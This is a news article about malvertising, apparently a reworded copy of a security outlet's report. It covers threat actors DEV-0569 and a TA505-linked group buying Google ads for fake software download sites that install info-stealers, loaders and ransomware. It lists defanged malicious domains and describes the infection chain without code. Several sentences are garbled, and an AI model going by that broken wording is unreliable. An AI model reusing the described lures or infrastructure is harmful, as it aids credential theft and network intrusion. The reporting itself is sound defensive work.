Ransomware access brokers use Google ads to breach your network

A person with a smiley face

A threat actor tracked as DEV-0569 uses Google Ads in widespread, ongoing advertising campaigns to distribute malware, steal victims’ passwords, and ultimately breach networks for ransomware attacks.

Over the past few weeks, cybersecurity researchers have MalwareHunterTeam, German Fernandezand Will Dorman has illustrated how Google search results have become a hotbed for malicious advertisements pushing malware.

These ads pretend to be websites for popular software programs, such as LightShot, Rufus, 7-Zip, FileZilla, LibreOffice, AnyDesk, Awesome Miner, TradingView, WinRAR, and VLC.

Google ads promoting fake software websites are pushing malware
Google ads promoting fake software websites are pushing malware
Source: Researchers/BleepingComputer

Clicking on the ads takes visitors to websites that appear as download portals or copies of the software’s legitimate websites, as shown below.

Fake Rufus download site
Fake Rufus download site
Source: BleepingComputer

But when you click on the download links, you usually download an MSI file that installs different malware depending on the campaign.

The list of malware installed in these campaigns so far includes RedLine Stealer, Gozi/Ursniff, Vidar and potentially Cobalt Strike and ransomware.

While there appear to be many threat actors abusing the Google Ads platform to distribute malware, two particular campaigns stand out as their infrastructure was previously linked to ransomware attacks.

From Google ads to ransomware attacks

In February 2022, Mandiant discovered a malware distribution campaign that used SEO poisoning to rank websites pretending to be popular software in search results.

If a user installed the software offered from these sites, it would execute a new malware downloader called BatLoader, which launches a multi-step infection process that ultimately gives the threat actors initial access to the victims’ networks.

Later that year, Microsoft reported that the threat actors behind BatLoader, tracked as DEV-0569, had begun using Google ads to promote their malicious websites. Even worse, Microsoft said these infections ultimately led to the deployment of the Royal Ransomware on breached networks.

“Recent activity by the threat actor that Microsoft tracks as DEV-0569, known to distribute various payloads, has led to the deployment of Royal ransomware, which first appeared in September 2022 and is distributed by multiple threat actors,” Microsoft warned in their report .

Researchers believe that DEV-0569 is an initial access broker that uses its malware distribution system to breach corporate networks. They use this access in their own attacks or sell it to other malicious actors, such as the Royal ransomware gang.

Although Microsoft did not share many URLs related to these attacks, additional reports from TheFIR and eSentire added more information, including the following URLs used in BatLoader’s campaigns:

ads-check[.]com (Used for tracking Google ads statistics)

Fast forward to January 21, 2023, when CronUp researcher German Fernandez noted that recent Google ads promoting popular software led to malicious websites using infrastructure operated by the DEV-0569 threat actors.

While malicious installers in this campaign no longer use BatLoader like the previous campaigns seen by Microsoft, they install an information stealer (RedLine Stealer) and then a malware downloader (Gozi/Ursniff).

In the current campaign, RedLine is used to steal data, such as passwords, cookies and cryptocurrency wallets, while Gozi/Ursniff is used to download additional malware.

Germán told BleepingComputer that he linked these new campaigns to DEV-0569 as they used the same bitbucket repository and ad check[.]com Web address used in the reported November/December 2022 campaigns.

Germán did not wait long enough to see if Cobalt Strike and Royal Ransomware would be installed. However, he told BleepingComputer that he believed the hackers would eventually use the Gozi infection to drop Cobalt Strike, as BatLoader did in previous campaigns.

Germán also gained access to DEV-0569’s web panel used to track their malware distribution campaign and shared screens on Twitter. These screenshots showed the legitimate programs that were impersonated and the numerous victims worldwide that were infected daily.

Another campaign linked to CLOP ransomware

To make matters worse, German discovered that a different but similar Google ad campaign used infrastructure previously used by a threat group tracked as TA505 known to distribute CLOP ransomware.

In this Google ad campaign, the threat actors distribute malware through websites pretending to be popular software, such as AnyDesk, Slack, Microsoft Teams, TeamViewer, LibreOffice, Adobe, and oddly, websites for W-9 IRS forms.

Fake AnyDesk ad seen by Will Dormann
Fake AnyDesk ad seen by Will Dormann
Source: Dormann

A list of domains in this campaign tracked by CronUp is available on this GitHub page.

Once installed, the malware from this campaign runs a PowerShell script that downloads and executes a DLL from the website download cdn[.]comWhich one TA505 previously used.

PowerShell script to download malware
PowerShell script to download malware
Source: BleepingComputer

Dog Proofpoint threat researcher Tommy Madjar told BleepingComputer that this domain had changed ownership previously and it is unclear if TA505 is still using it.

Regardless of who owns these domains, the sheer number of malicious Google ads appearing in search results is becoming a massive problem for both consumers and the business.

With these campaigns used to gain initial access to the company’s network, they can lead to various attacks such as data theft, ransomware and even destructive attacks to disrupt a company’s operations.

Although BleepingComputer did not contact Google regarding this article, we did contact them last week regarding a similar malware campaign distributed via Google ads.

Google told us at the time that the platform’s policies are designed and enforced to prevent brand impersonation.

“We have robust policies that prohibit ads that attempt to circumvent our enforcement by hiding the advertiser’s identity and impersonating other brands, and we enforce them vigorously. We have reviewed the ads in question and have removed them,” Google told BleepingComputer.

The good news is that Google has been removing ads as they are reported and discovered.

The bad news is that the threat actors are constantly launching new ad campaigns and new websites, making it a giant game of whack-a-mole, and it doesn’t feel like Google is winning.


Leave a Reply

Your email address will not be published. Required fields are marked *